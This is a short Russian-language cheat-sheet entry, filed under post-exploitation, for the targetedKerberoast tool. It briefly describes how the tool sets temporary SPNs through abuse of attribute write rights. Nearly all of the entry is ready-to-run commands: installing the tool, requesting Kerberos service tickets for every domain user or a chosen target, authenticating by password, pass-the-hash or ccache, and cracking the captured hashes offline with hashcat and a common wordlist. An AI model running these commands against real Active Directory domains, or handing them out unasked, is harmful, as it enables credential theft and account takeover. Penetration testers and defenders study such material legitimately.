Post-Exploitation
Python-утилита для Kerberoast-атаки с дополнительным механизмом ACL abuse: для пользователей без SPN скрипт пытается временно выставить SPN (используя права на запись в атрибут `servicePrincipalName`), получает Kerberos hash, затем …
Установка
git clone https://github.com/p0dalirius/targetedKerberoast
cd targetedKerberoast
pip install -r requirements.txt
# Атака по всем пользователям домена
python targetedKerberoast.py \
-d domain.local \
-u user \
-p 'Password123!' \
--dc-ip 192.168.1.101
# Только конкретный пользователь
python targetedKerberoast.py -d domain.local -u user -p Pass \
--request-user target_user --dc-ip 192.168.1.101
# Pass-the-hash
python targetedKerberoast.py -d domain.local -u user \
-H 'LMHASH:NTHASH' --dc-ip 192.168.1.101
# Kerberos auth (ccache)
export KRB5CCNAME=/tmp/user.ccache
python targetedKerberoast.py -d domain.local -k --no-pass --dc-ip 192.168.1.101
# Сохранить хеши и взломать
python targetedKerberoast.py -d domain.local -u user -p Pass -o hashes.txt
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt